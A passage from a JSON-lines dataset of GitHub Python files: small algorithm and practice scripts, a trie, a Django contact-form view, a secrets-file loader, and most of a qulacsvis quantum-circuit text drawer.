y[0])**2 + (x[1] - y[1])**2)\n\n\ndef get_incident_point(point, line):\n # ax + by + c -> -bx + ay + c' -> -bx + ay + bx1 - ay1\n perpendicular = [-line[1], line[0],\n (line[1]*point[0]) - (line[0]*point[1])]\n A = np.array([line[:2], perpendicular[:2]])\n B = np.array([line[-1:], perpendicular[-1:]])\n incident_point = np.matmul(np.linalg.inv(A), -1*B)\n return incident_point[0, 0], incident_point[1, 0]\n\n\ndef optimum_distance(points, line):\n min_sum_of_distances = inf\n for point in points:\n incident_point = get_incident_point(point, line)\n sum_of_distances = sum([distance(point, incident_point) for point in points])\n if sum_of_distances < min_sum_of_distances:\n min_sum_of_distances = sum_of_distances\n return min_sum_of_distances\n\n\npoints = [\n [-3, -2],\n [-1, 0],\n [-1, 2],\n [1, 2],\n [3, 4]\n]\n\nline = [1, -1, -3]\n\nprint(optimum_distance(points, line))\n","repo_name":"ritikrajdev/450DSA","sub_path":"Search & Sort/05_optimum_location.py","file_name":"05_optimum_location.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40764650355","text":"#!/usr/bin/env python\n# encoding: utf-8\n# @author: liusir\n# @file: demo_06.py\n# @time: 2020/11/29 11:44 上午\n\nstr1 = {\"errcode\":45157,\"errmsg\":\"invalid tag name hint: [ufofmzNre-xPogda] rid: 5fc31853-65c5781c-589a24b3\"}\ncheck_data = \"tag\"\n\ndef key_check(check_data):\n key_list = check_data.split(',')\n tmp_result = []\n for key in key_list:\n if key in str1.keys():\n tmp_result.append(True)\n else:\n tmp_result.append(False)\n if False in tmp_result:\n return False\n else:\n return True\n\nprint( key_check(check_data) )\n","repo_name":"qq329999897/P3P4_API_Test_Framework","sub_path":"samples/20201129/demo_06.py","file_name":"demo_06.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41631866012","text":"class Node:\n def __init__(self):\n self.children = {}\n self.isEndOfWord = False\n\nclass Trie:\n def __init__(self):\n self.root = Node()\n\n def insert(self, key):\n # If not present, inserts key into trie\n # If the key is prefix of trie node,\n # just marks leaf node\n\n curr = self.root\n\n for i in range(0, len(key)):\n if (key[i] not in curr.children):\n curr.children[key[i]] = Node()\n \n curr = curr.children[key[i]]\n \n curr.isEndOfWord = True\n \n def search(self, key):\n # Search key in the trie\n # Returns true if key presents\n # in trie, else false\n curr = self.root\n\n for i in range(0, len(key)):\n if (key[i] not in curr.children):\n return False\n \n curr = curr.children[key[i]]\n \n return curr.isEndOfWord\n \n def findEndingWords(self, node):\n amount = 0\n if (node.isEndOfWord):\n amount += 1\n \n for child in node.children:\n amount += self.findEndingWords(node.children[child])\n \n return amount\n \n def prefixSearch(self, key):\n curr = self.root\n count = 0\n for i in range(0, len(key)):\n if (key[i] not in curr.children):\n return 0\n \n curr = curr.children[key[i]]\n \n count += self.findEndingWords(curr)\n\n return count\n \n\n \n# driver function\ndef main():\n \n # Input keys (use only 'a' through 'z' and lower case)\n keys = [\"the\",\"a\",\"there\",\"anaswe\",\"any\",\n \"by\",\"their\"]\n output = [\"Not present in trie\",\n \"Present in trie\"]\n \n # Trie object\n t = Trie()\n \n # Construct trie\n for key in keys:\n t.insert(key)\n \n # Search for different keys\n print(\"{} ---- {}\".format(\"the\",output[t.search(\"the\")]))\n print(\"{} ---- {}\".format(\"these\",output[t.search(\"these\")]))\n print(\"{} ---- {}\".format(\"their\",output[t.search(\"their\")]))\n print(\"{} ---- {}\".format(\"thaw\",output[t.search(\"thaw\")]))\n\n keys = [\"hack\", \"hackerrank\"]\n t2 = Trie()\n\n for key in keys:\n t2.insert(key)\n \n lookup = [\"hac\", \"hak\", \"hack\", \"hacker\"]\n\n for key in lookup:\n print(t2.prefixSearch(key))\n\n\n \nif __name__ == '__main__':\n main()\n ","repo_name":"ericaltenburg/interviewPrep","sub_path":"code/ds/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9900300608","text":"\nclass Badboys:\n\tx=[]\n\ty=[]\n\tfor i in range(0,2):\n\t\tname=input('type the name..!')\n\t\tusn=input('your USN:')\n\t\tx.append(name)\n\t\ty.append(usn)\n\tfor j in range(0,2):\n\t\tprint('Name:',x[i])\n\t\tprint('age:',y[j])\np=Badboys()\t\t\t\t\n\n","repo_name":"Thennavanmohan/18RoyalmechD12018","sub_path":"classfive.py","file_name":"classfive.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5915479780","text":"from django.shortcuts import render, redirect\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom .models import Contact\n\ndef contact(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n phone = request.POST.get('phone')\n email = request.POST.get('email')\n message = request.POST.get('message')\n\n contact = Contact(name=name, phone=phone, email=email, message=message)\n contact.save()\n \n \n # send email\n subject = 'New message from your website'\n message = f'Name: {name}\\nPhone: {phone}\\nEmail: {email}\\nMessage: {message}'\n from_email = settings.DEFAULT_FROM_EMAIL\n recipient_list = [settings.DEFAULT_FROM_EMAIL]\n send_mail(subject, message, from_email, recipient_list, fail_silently=False)\n messages.success(request, 'Your message has been sent!')\n return redirect('contact')\n\n return render(request, 'contactapp/contact.html')\n\n# def contact(request):\n# return render(request,'contactapp/contact.html')","repo_name":"pinkal-sanoria/BojoTravelsProject","sub_path":"BojoTravels/contactapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5550438712","text":"from pathlib import Path\n\n\nclass Secrets:\n def __init__(self, base_path: Path = Path('/run/secrets/')):\n self.base_path = base_path\n self._cache = {}\n\n def __getitem__(self, item) -> bytes:\n if not isinstance(item, str):\n raise TypeError(f'Invalid secret key type {type(item)}')\n\n if item not in self._cache:\n secret_file = self.base_path / item\n if not secret_file.exists():\n raise KeyError('Secret does not exist')\n\n with secret_file.open('rb') as f:\n self._cache[item] = f.read()\n\n return self._cache[item]\n\n\nsecrets = Secrets()\n","repo_name":"juananpe/forum40","sub_path":"backend/config/secrets.py","file_name":"secrets.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70961627574","text":"# mypy: ignore-errors\nimport dataclasses\nimport shutil\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\nfrom qulacs import QuantumCircuit, QuantumGateBase\n\nfrom qulacsvis.models.circuit import ControlQubitInfo\nfrom qulacsvis.utils.gate import to_text_style\n\n\n@dataclasses.dataclass\nclass DotStyle:\n ctrl: str\n ctrlo: str\n\n\nCON_DOT_STYLE: Dict[str, DotStyle] = {\n \"large\": DotStyle(ctrl=\"●\", ctrlo=\"○\"),\n \"small\": DotStyle(ctrl=\"・\", ctrlo=\"⚬\"),\n}\n\n\ndef _set_con_dot(dot: str) -> DotStyle:\n \"\"\"\n Set a character to mean control qubit.\n\n Parameters\n ----------\n dot: str\n dot style \"large\" or \"small\"\n\n Returns\n -------\n str\n dot character\n \"\"\"\n if dot in CON_DOT_STYLE:\n return CON_DOT_STYLE[dot]\n else:\n return CON_DOT_STYLE[\"large\"]\n\n\nclass _Gate_AA_Generator:\n \"\"\"qulacsの量子ゲート(QuantumGateBase)を描画するためのクラス\"\"\"\n\n def __init__(self, *, dot: str = \"large\") -> None:\n # このgate_stringにゲートの上の部分から文字列を作成して追加していきゲートの形を作成\n self.gate_string: List[str] = []\n\n # 制御qubitの記号\n self.CON_DOT = _set_con_dot(dot)\n\n def generate(\n self, gate: QuantumGateBase, index: str = \" \", verbose: bool = False\n ) -> List[str]:\n \"\"\"引数のゲートを文字列表示で返してくれる関数\n Argeuments:\n gate: Qulacsのゲート(QuantumGateBase)\n index: circuitに追加された順番を示す値, 1000以上の場合は表示が崩れる\n verbose: Trueだと詳細出力, 表示されるゲートにcircuitで追加された順番(引数のindex)を表示\n Return:\n gate_string: 1次元のリスト(リストのリスト)\n 1次元目が行の指定, 2次元目が文字の指定\n\n ゲートの表示法とパーツの説明(CNOTを例に)\n ・大きさは縦8×横7\n 0123456 パーツ名 説明\n 0 <= control_q_head : 制御qubitのときの空白文字\n 1 <= control_q_name : 上に同じ\n 2 ---・--- <= control(_o)_q_body : このqubitが制御qubitであることを示す\"・,⚬\"\n 3 | <= vertical_wire : 制御qubitと接続する縦向きのワイヤー\n 4 _|_ <= gate_head : ゲートの天井\n 5 |CX | <= gate_name : どのゲートかを表示するゲートの名前と左右の壁\n 6 -| |- <= gate_body_with_wire : ゲートの左右の壁, ワイヤーのないものはgate_body\n 7 |___| <= gate_botom : ゲートの下底\n\n \"\"\"\n # ゲートの文字列表現を初期化\n self.gate_string.clear()\n\n # verboseに応じて回路への追加番号を表示させるかさせないか文字列を作成\n if verbose:\n index = str(index).zfill(3)\n else:\n index = \" \"\n\n # 実際にゲートが適用されるターゲットqubitのリストと, コントロール用の制御qubitのリストを取得\n t_list = gate.get_target_index_list()\n c_list = gate.get_control_index_list()\n cv_list = [\n ControlQubitInfo(index, control_value)\n for index, control_value in gate.get_control_index_value_list()\n ]\n # ゲート作成時の引数の順番や, add_control_qubitメソッドなどで\n # 制御qubitを追加したときなどでリストが昇順になっていないことがあるのでソートしておく\n t_list.sort()\n c_list.sort()\n cv_list.sort(key=lambda x: x.index)\n\n # 制御qubitが実ゲート(ターゲットqubitにかかるゲート)より上に存在するかチェック\n if len(c_list) != 0 and min(t_list) > min(c_list):\n # 制御qubitが実ゲートより上に存在した\n upper = True\n # ターゲットqubitにかかるゲートより上側に存在する制御qubitの部分の文字列表現を作成\n self.gen_upper_control_part(t_list, cv_list)\n else:\n # 制御qubitが実ゲートより上に存在しない\n upper = False\n\n # ターゲットqubitにかかる部分のゲートの文字列表現を作成\n self.gen_target_part(gate, t_list, index, upper)\n\n # 制御qubitが実ゲートの間に存在するときの制御qubitを描画\n self.gen_inner_control_part(t_list, cv_list)\n\n # 制御qubitが実ゲート(ターゲットqubitにかかるゲート)より下に存在するかチェック\n if len(c_list) != 0 and max(t_list) < max(c_list):\n # ターゲットqubitにかかるゲートより上側に存在する制御qubitの部分の文字列表現を作成\n self.gen_lower_control_part(t_list, cv_list)\n\n return self.gate_string\n\n def gen_upper_control_part(\n self, t_list: List[int], cv_list: List[ControlQubitInfo]\n ) -> None:\n \"\"\"ターゲットqubitにかかるゲートより上側に存在する制御qubitを描くメソッド\"\"\"\n # 以下制御qubit用のパーツ作り\n # 制御qubit用の部分の形(空)\n control_q_head = \" \"\n # 制御qubit用の部分の形(空)\n control_q_name = \" \"\n # 制御qubit用の部分の接続の部分の形\n control_q_body = \" {} \".format(self.CON_DOT.ctrl)\n control_o_q_body = \" {} \".format(self.CON_DOT.ctrlo)\n # 制御信号用のワイヤーの形\n vertical_wire = \" | \"\n\n # ターゲットqubitにかかるゲートよりも上側に存在している制御qubitのリスト\n upper_c_list: List[ControlQubitInfo] = [\n i for i in cv_list if i.index < min(t_list)\n ]\n\n # 制御qubitの回路図を構成していく\n self.gate_string.append(control_q_head)\n self.gate_string.append(control_q_name)\n if upper_c_list[0].control_value == 0:\n self.gate_string.append(control_o_q_body)\n else:\n self.gate_string.append(control_q_body)\n # 制御qubitと実ゲートのqubitでもっとも離れているqubit(実ゲートのqubitは一番上のqubit)を選び\n # 距離を計算. このqubitから下へと縦のワイヤーを引く\n diff = min(t_list) - min(upper_c_list, key=lambda x: x.index).index\n for _ in range(diff * 4 - 3):\n self.gate_string.append(vertical_wire)\n\n # 制御信号をどのワイヤーからとっているか表す\"・\"を描き込む\n # 最初の制御qubitは描き込み済みなので2つ目以降の制御qubitから\n for i in upper_c_list[1:]:\n # 制御qubitと実ゲートのかかるqubitで最も近いものとがいくつ離れているか計算\n diff = min(t_list) - i.index\n # 仕様に合わせて位置を調整\n p = diff * 4 - 2\n # 配列に\"・\"を描き込み(上書き)\n if i.control_value == 0:\n self.gate_string[-p] = control_o_q_body\n else:\n self.gate_string[-p] = control_q_body\n\n def gen_target_part(\n self, gate: QuantumGateBase, t_list: List[int], index: str, upper: bool\n ) -> None:\n \"\"\"ターゲットqubitにかかる部分のゲートの文字列表現を描くメソッド\"\"\"\n # ターゲットqubitにかかる部分のゲートの大きさを取得\n # ゲートのかかるqubit同士が離れている場合はその間のqubitも使用すると考えて回路図を描くので,\n # 正確にはゲートのかかるqubitのうち一番上のqubitから一番下のqubitまでの大きさ\n gate_size = max(t_list) - min(t_list) + 1\n\n # ゲートの上部分の形\n # もしコントロールqubitが実ゲートよりも上にあるとき, つまり上から制御用のワイヤーが入るとき\n # ゲートの上の形は制御の線を接続した形になる\n if upper:\n gate_head = \" _|_ \"\n else:\n gate_head = \" ___ \"\n # ゲートの名前が表示される部分の形\n try:\n # ゲートの横幅を3文字分でゲート名を作成\n gate_name = \" |{}| \".format(to_text_style(gate.get_name()))\n except KeyError:\n # もし新たに追加されたゲートなどで見つからなかったときは\"UnDeFined\"\n gate_name = \" |UDF| \"\n # ワイヤー付き, またはついていない部分のゲートの形\n # パラメータ付き回路やDenseMatrixの場合はこの部分にパラメータを入れて表示させたい\n gate_body_with_wire = \"-| |-\"\n gate_body = \" | | \"\n # ゲートの下部分の形\n gate_bottom = \" |___| \"\n\n # 作成を始める\n if gate_name == \" |SWP| \":\n # SWAPの時だけ別に描く, どこがスワップするのか少し見にくかったので. 下のelse以下の表示法でも可.\n self.create_SWAP_gate_string(gate_size, t_list, index)\n else:\n # SWAP以外の全てのゲートは以下\n self.gate_string.append(gate_head) # ゲートの一番頭部分\n self.gate_string.append(gate_name) # ゲートの種類表示の部分\n self.gate_string.append(\"-|{}|-\".format(index)) # ゲートの追加番号or空白の部分\n for i in range(1, gate_size * 4 - 3): # 左右の壁の部分を描くループ\n # ((i+2)//4)+(描き始めのqubitのインデックス)は現在いるqubitのインデックス描いているqubitのインデックス\n q_index = (i + 2) // 4 + min(t_list)\n if q_index in t_list:\n # 現在描いている壁がターゲットqubitのリストの中にあるとき,\n # つまり, 今描いている壁の部分は実際にゲートが適用されるqubitであるとき\n # i%4の値でゲートのどの部分を描いているかが分かる(1つのゲートの高さが4なため)\n if i % 4 == 0:\n # 余りが0のときは横向きのワイヤーが接続する部分なのでwith_wireを繋ぐ\n self.gate_string.append(gate_body_with_wire)\n elif i % 4 == 1:\n # 余りが1のときはゲートの底部分, または離れたqubitにかかるゲートを描いているときの\n # 横幅が狭い(1文字分)の壁の部分. どちらかによって描き方が変わる.\n if q_index + 1 in t_list:\n # 今描いているqubitのインデックス+1のqubitもゲートがかかるとき,\n # つまり, 次のqubitもゲートがかかるとき\n self.gate_string.append(gate_body) # 3文字分のゲート幅の壁を追加\n else:\n # 今描いているqubitのインデックス+1のqubitにはゲートがかからないとき,\n # つまり, 今描いているのqubitの隣のqubitにはゲートがかからず,\n # 離れたqubitにゲートがかかるとき(ゲートのかかるqubitが隣接していないとき)\n self.gate_string.append(\n \" |_ _| \"\n ) # 次のqubitにはかからないことを示すため狭める\n elif i % 4 == 2:\n # 余りが2のときはゲートの頭部分, または連続したqubitにかかる多qubitゲートを\n # 描いているときの3文字分のゲートの壁の部分. どちらかによって描き方が変わる.\n if q_index - 1 in t_list:\n # 今描いているqubitの1つ前のqubitにもゲートがかかっていたとき,\n # つまり, 前のqubitのゲートと連続して今描いているqubitにもゲートがかかるとき\n self.gate_string.append(gate_body) # 3文字分のゲート幅の壁を追加\n else:\n # 今描いているqubitの1つ前のqubitにはゲートがかかっていなかったとき,\n # つまり, 前のqubitはゲートのかからないqubitで今描いているqubitが実は\n # 離れた位置に存在したゲートのかかるqubitのとき\n self.gate_string.append(\n \" _| |_ \"\n ) # このqubitからゲートがかかることを示すため広げる\n else:\n # 余りが3のときはgate_nameにあたる部分だが, 多qubitゲートの場合は描くものがない\n self.gate_string.append(gate_body) # 3文字分のゲートの壁を追加\n\n else:\n # 現在描いている壁がターゲットqubitのリストの中にないとき,\n # つまり, 今描いている壁の部分は実際にゲートが適用されないqubitで\n # もっと下の(離れた位置にある)qubitにかかるゲートを描くための間の部分のqubitのときである.\n # このときは, 今のqubitにはかかっていないことを見やすくするためにゲートの幅を1文字分に変更したものを表示する\n if i % 4 == 0:\n # この位置は横向きのワイヤーを描く部分\n self.gate_string.append(\"--| |--\")\n else:\n # ゲート幅が1文字分になるようのゲートの左右の壁を描く\n self.gate_string.append(\" | | \")\n self.gate_string.append(gate_bottom) # ゲートの最も底部分\n\n def create_SWAP_gate_string(\n self, gate_size: int, t_list: List[int], index: str\n ) -> None:\n \"\"\"SWAPゲートをきれいに描くためのメソッド\"\"\"\n # ゲートの上部分の形, SWAPは空\n gate_head = \" \"\n # ゲートの名前が表示される部分の形, verbose=Trueのときは追加された順番でそれ以外は空\n gate_name = \" {} \".format(index)\n # SWAPする位置を表す部分. この部分が他のゲートの場合と異なり, \"×\"が着くのは\n # SWAPする2点のqubitのみでその間のqubitのワイヤーは接続の縦線ワイヤーで描きたい\n swap_body_with_wire = \"---x---\"\n gate_body_with_wire = \"---|---\"\n # 右壁と左壁の部分, SWAPの場合はSWAPするqubit同士を繋ぐ縦線のワイヤー\n gate_body = \" | \"\n # ゲートの下部分の形, SWAPは空\n gate_bottom = \" \"\n\n # 作成し始める\n self.gate_string.append(gate_head) # 頭部分\n self.gate_string.append(gate_name) # ゲートの種類表示の部分\n self.gate_string.append(swap_body_with_wire) # SWAPする1つ目のqubitの\"×\"部分\n for i in range(1, gate_size * 4 - 4): # 左右の壁の部分\n if i % 4 == 0:\n self.gate_string.append(gate_body_with_wire)\n else:\n self.gate_string.append(gate_body)\n self.gate_string.append(swap_body_with_wire) # SWAPする2つ目のqubitの\"×\"部分\n self.gate_string.append(gate_bottom) # 底部分\n\n def gen_inner_control_part(\n self, t_list: List[int], cv_list: List[ControlQubitInfo]\n ) -> None:\n \"\"\"実ゲートが離れたqubitにかかる場合で, 制御qubitがその間にあるときに描くメソッド\"\"\"\n # 実ゲートの間に存在している制御qubitのリストを作成\n inner_c_list = [\n i for i in cv_list if i.index > min(t_list) and i.index < max(t_list)\n ]\n\n # 上で作成したリストを基に, 既に作成済みである実ゲートを上書きする(空リストの時はなにもしない)\n for i in inner_c_list:\n # (取得した制御qubitのインデックス)-(実ゲートの一番上のqubit)で描き始めのqubitから\n # 何個下のqubitに描き込めばよいか分かる. この値をゲートの高さ分修正(*4-2)して中央をドットに書き換える\n row = (i.index + 1 - min(t_list)) * 4 - 2\n if i.control_value == 0:\n control_dot_str = self.CON_DOT.ctrlo\n else:\n control_dot_str = self.CON_DOT.ctrl\n\n self.gate_string[row] = (\n self.gate_string[row][:3] + control_dot_str + self.gate_string[row][4:]\n )\n\n def gen_lower_control_part(\n self, t_list: List[int], cv_list: List[ControlQubitInfo]\n ) -> None:\n \"\"\"ターゲットqubitにかかるゲートより下側に存在する制御qubitを描くメソッド\"\"\"\n # 以下制御qubit用のパーツ作り\n # 制御qubit用の部分の接続の部分の形\n control_q_body = \" {} \".format(self.CON_DOT.ctrl)\n control_o_q_body = \" {} \".format(self.CON_DOT.ctrlo)\n # 制御信号用のワイヤーの形\n vertical_wire = \" | \"\n\n # ターゲットqubitにかかるゲートよりの下側に存在している制御qubitのリスト\n below_c_list: List[ControlQubitInfo] = [\n i for i in cv_list if i.index > max(t_list)\n ]\n\n # 制御qubitと実ゲートのqubitでもっとも離れているqubit(実ゲートのqubitは一番下のqubit)を選び\n # 距離を計算. このqubitから下へと縦向きのワイヤーを引く\n diff = max(below_c_list, key=lambda x: x.index).index - max(t_list)\n loop = diff * 4 - 1\n for _ in range(loop):\n self.gate_string.append(vertical_wire)\n\n # 制御信号をどのワイヤーからとっているか表す\"・\"を描き込む\n for i in below_c_list:\n # 制御qubitとゲートとの距離を計算\n diff = i.index - max(t_list)\n # 仕様に合わせて位置を調整\n p = diff * 4 - loop - 2\n # 配列に\"・\"を描き込み(上書き)\n if i.control_value == 0:\n self.gate_string[p] = control_o_q_body\n else:\n self.gate_string[p] = control_q_body\n\n\nclass TextCircuitDrawer:\n \"\"\"qulacsの量子回路(QuantumCircuit)を描画するためのクラス\"\"\"\n\n def __init__(self, circuit: QuantumCircuit, *, dot: str = \"large\") -> None:\n # 制御qubitの記号\n self.CON_DOT = _set_con_dot(dot)\n # 出力したい量子回路\n self.circ = circuit\n # 出力したい量子回路の深さ\n self.depth = circuit.calculate_depth()\n # 出力したい量子回路のqubit数\n self.qubit_num = circuit.get_qubit_count()\n\n # 量子回路図をできるだけ左詰め(回路が浅くなるよう)に配置するための参照する配列\n # 2次元配列であり要素数は(qubit数)*(回路の深さ) <= 場合により深くなっていく\n # 各qubitのそれぞれの深さにおいてゲートをセットできる場合はTrueを, できない場合はFalseを表示する\n # 例) gate_map = [[False, False, True], ← 1qubit目\n # [False, True, True], ← 2qubit目\n # [True, True, True]] ← 3qubit目\n # ↑ ↑ ↑\n # 深さ1 深さ2 深さ3\n # 上のgate_mapは\n # ・1qubit目は深さ1と深さ2ですでにゲートが存在している, 次にゲートを適用できるのは深さ3の場所\n # ・2qubit目は深さ1の場所にすでにゲートが存在している, 次にゲートを適用できるのは深さ2の場所\n # ・3qubit目はまだゲートが存在していない, 次にゲートを適用できるのは深さ1の場所\n # を表す\n self.gate_map = np.full((self.qubit_num, self.depth), True)\n\n # 量子回路の文字列表示を保持させる変数(2次元配列)\n # 要素に文字1文字を割り当て、回路図として表現する方針\n # 大きさは縦が(qubit数×4). 4は1つのゲートの縦幅.\n # 横が(深さ×7)+(深さ-1)+2. 7は1つのゲートの横幅. (深さ-1)は各深さに存在するゲート同士を\n # \"-\"で繋ぐため,その数. +2は回路の左端と右端を\"-\"1文字で描画するため.\n # 以下イメージ\n # 深さが1と2のゲートの\n # 左端 間のワイヤーの位置 右端\n # ↓ ↓ ↓\n # 0 1 2 3 4 5 6 7 8 9 A B C D E F 10 (<=16進数表示) ←横サイズ\n # 0 _ _ _\n # 1 | X |\n # 2 - - | | - - - - - ・ - - - -\n # 3 | _ _ _ | |\n # 4 _ | _\n # 5 | D e M |\n # 6 - - - - - - - - - - | | - -\n # 7 | _ _ _ |\n # ↑縦サイズ <=====> ゲートの幅は3文字分, これに前後の壁である\"-|\", \"|-\"を\n # 合わせると1つのゲートの幅は7文字分.\n\n self.vertical_size = self.qubit_num * 4 # 縦サイズ\n self.horizontal_size = self.depth * 7 + self.depth - 1 + 2 # 横サイズ\n self.circuit_picture = np.full(\n (self.vertical_size, self.horizontal_size), \" \"\n ) # 配列作成,空白1文字で初期化\n # 量子回路の左端と右端のワイヤーを\"-\"で描いておく\n for i in range(self.qubit_num):\n # 横向きのワイヤーがある場所は配列番号で2,6,10,14,...番目\n row = (i + 1) * 4 - 2\n self.circuit_picture[row][0] = \"-\"\n self.circuit_picture[row][-1] = \"-\"\n\n # 単体のゲートの文字列表現を作成するクラスを呼び出す\n self.AA_Generator = _Gate_AA_Generator(dot=dot)\n\n def draw(self, verbose: bool) -> None:\n \"\"\"実際に回路を描き始め出力までするメソッド\"\"\"\n # 出力したい量子回路の持つゲート数を取得\n gate_num = self.circ.get_gate_count()\n # ゲートを1つずつ取り出し回路図に描き込んでいく\n for i in range(gate_num):\n gate = self.circ.get_gate(i)\n # 確率的に作用するゲートなどでtarget_qubitのインデックスが無いものはスキップする\n if len(gate.get_target_index_list()) == 0:\n print(\n f\"CAUTION: The {i}-th Gate you added is skipped.\"\n + 'This gate does not have \"target_qubit_list\"'\n )\n else:\n self._draw_gate(gate, index=i, verbose=verbose)\n\n # ゲートを描き終えたら, ゲート同士や接続が切れているワイヤーを繋ぐ\n self._connect_wire()\n\n # 描き込まれたゲートを実際に出力する\n # ただし、回路の長さに応じて表示方法を変える\n terminal_size = shutil.get_terminal_size().columns - 1 # プロンプトの1行に表示できる文字数-1\n # プロンプトに収まる場合は普通に表示\n if self.horizontal_size <= terminal_size:\n for line in self.circuit_picture:\n print(\"\".join(line))\n # 回路が長いときは途中で折り返して表示する\n else:\n # 折り返して表示するときの、表示を繰り返す回数\n col = self.horizontal_size // terminal_size\n # 折り返して表示する際の区切り文字。\"#\"で区切る\n delimiter = \"\\n\" + \"#\" * terminal_size\n # 回路図のどこまでを表示したか思えておく変数\n plot_range = 0\n # プロンプトの横幅までの表示を繰り返す\n print(delimiter)\n for i in range(col):\n # 今何回目の表示かを出力\n print(\">>\", i)\n # 回路図の出力\n for line in self.circuit_picture:\n print(\"\".join(line[plot_range : plot_range + terminal_size]))\n # 表示済みの回路図を記憶\n plot_range += terminal_size\n # 区切りの出力\n print(delimiter)\n # 回路の最後の部分の表示\n print(\">>\", col)\n for line in self.circuit_picture:\n print(\"\".join(line[plot_range:]))\n print(delimiter)\n\n def _draw_gate(self, gate: QuantumGateBase, index: str, verbose: bool) -> None:\n \"\"\"引数にgateをとり, 「ゲートの文字化」, 「適切な位置に描き込み」 の順で実際に描き込むメソッド\"\"\"\n # 単一のゲートの文字列表示を作成\n gate_string = self.AA_Generator.generate(gate, index, verbose)\n\n # 実際にゲートが適用されるターゲットqubitと, コントロール用の制御qubitのリストを取得\n target_qubit_list = gate.get_target_index_list()\n control_qubit_list = gate.get_control_index_list()\n # 続いて, 制御qubitとターゲットqubitの両方を合わせた, 実際にゲートがかかるqubitのリストを取得.\n tc_list = target_qubit_list + control_qubit_list\n # これは例えばCNOT(0,2), X(1)のような回路を描こうとしたとき, 回路の深さは1だがそのまま深さ1で描こうとすると\n # ゲートの追加順に応じて CNOTの制御用ワイヤー上にXゲートが乗ってしまう or Xゲートで縦向きの制御信号の上書き\n # が起こってしまった. よって, 本プログラムでは回路の深さを増やして表示が重ならないようにして対応しようと考えた.\n # 方針として制御qubitとターゲットqubitが離れている場合を想定し, 間にまたがるqubit全てを確保することで実装する.\n\n # circuit_pictureに描き込むに必要な左上隅のインデックスを取得\n # 引数は使用するqubitのリストの最小値と最大値\n upper_left_corner = self._place_check(min(tc_list), max(tc_list))\n # 作成した文字列表示をircuit_pictureに描き込む\n self._write_gate_on_picture(gate_string, upper_left_corner)\n\n def _place_check(self, min_v: int, max_v: int) -> Tuple[int, int]:\n \"\"\"適切なゲートの描き込み位置を計算するメソッド\"\"\"\n # 回路の浅い所から探索\n for i in range(self.depth):\n # 使用したいqubitすべてが利用できるかチェック\n if all(self.gate_map[min_v : max_v + 1, i]):\n # 現在使うqubitの位置をFalseに変更する\n # このときTrueの場所(ゲートのかかる場所)より左側も全部Falseにする\n # そうしておかないと, 左詰めで適用する実装になっているので\n # 後から適用する1qubitゲートがその前にかかってしまったりする\n self.gate_map[min_v : max_v + 1, : i + 1] = False\n # 最終的に作成する2次元配列で考えた場合のqubitの位置・深さを計算するため\n # gate_mapの場合の計算結果を変数に保持させて終了する\n col = i\n break\n\n # 一番深いとこまで探索したのに, 描き込める場所が見つからなかったとき\n elif i + 1 == self.depth:\n # gate_mapとcircuit_pictureを拡張する\n self._expand_map_and_picture()\n # 追加した場所にゲートを割り当てていく\n self.gate_map[min_v : max_v + 1, : i + 2] = False\n col = i + 1\n\n # 仕様(2次元配列)に合わせて位置を調整\n row = min_v * 4\n col = col * 8 + 1\n\n return row, col\n\n def _expand_map_and_picture(self) -> None:\n \"\"\"回路図が重なって表示されないように深さを増やすメソッド\"\"\"\n # self.gate_mapの拡張\n additional_gate_map = np.full(self.qubit_num, True).reshape(self.qubit_num, 1)\n self.gate_map = np.concatenate([self.gate_map, additional_gate_map], axis=1)\n\n # self.circuit_pictureを拡張\n additional_circuit_pic = np.full((self.vertical_size, 8), \" \")\n self.circuit_picture = np.concatenate(\n [self.circuit_picture, additional_circuit_pic], axis=1\n )\n # 右端を\"-\"でセット\n for i in range(self.qubit_num):\n # 横向きのワイヤーがある場所は配列番号で2,6,10,14,...番目\n row = (i + 1) * 4 - 2\n self.circuit_picture[row][-1] = \"-\"\n\n # 深さを+1\n self.depth += 1\n # 深さが+1になったのでcircuit_pictureの横サイズも増やす\n self.horizontal_size += 8\n\n def _write_gate_on_picture(\n self, gate_string: List[str], ulc: Tuple[int, int]\n ) -> None:\n \"\"\"作成したゲート文字列を実際に描き込むメソッド\"\"\"\n row, col = ulc\n width = 7\n for line in gate_string:\n self.circuit_picture[row][col : col + width] = list(line)\n row += 1\n\n def _connect_wire(self) -> None:\n \"\"\"量子回路の横向きのワイヤーの接続を補うメソッド\"\"\"\n # 回路のqubit数回ループ\n for i in range(self.qubit_num):\n # 横向きのワイヤーがある場所は配列番号で2,6,10,14,...番目\n row = (i + 1) * 4 - 2\n # 先頭から1文字ずつ調査していくための変数\n p = 0\n # 各行の先頭から見ていく\n while True:\n # 先頭の文字を読む\n char_now = self.circuit_picture[row][p]\n if char_now in f\"{self.CON_DOT.ctrl}{self.CON_DOT.ctrlo}\":\n # 読んだのが\"・\"のときは次の文字が必ず空白になっているはずなので\"-\"に書き換える\n self.circuit_picture[row][p + 1] = \"-\"\n elif char_now == \"-\":\n # 読んだのが\"-\"のときは次の1文字を読む\n if self.circuit_picture[row][p + 1] == \" \":\n # \"-\"の次が\" \"(空白)なので\"-\"に書き換えワイヤーを繋げる\n self.circuit_picture[row][p + 1] = \"-\"\n elif self.circuit_picture[row][p + 1] == \"|\":\n # 読んだ文字が\"|\"のときはゲートの左壁にぶつかったorコントロールユニタリの制御信号(縦線)のどちらか\n # 最初に, 3文字分(通常のゲートの横幅分)を空けて次の文字を読んでみる\n # つまりp+1 + 3 + 1文字分先を読む\n if self.circuit_picture[row][p + 5] == 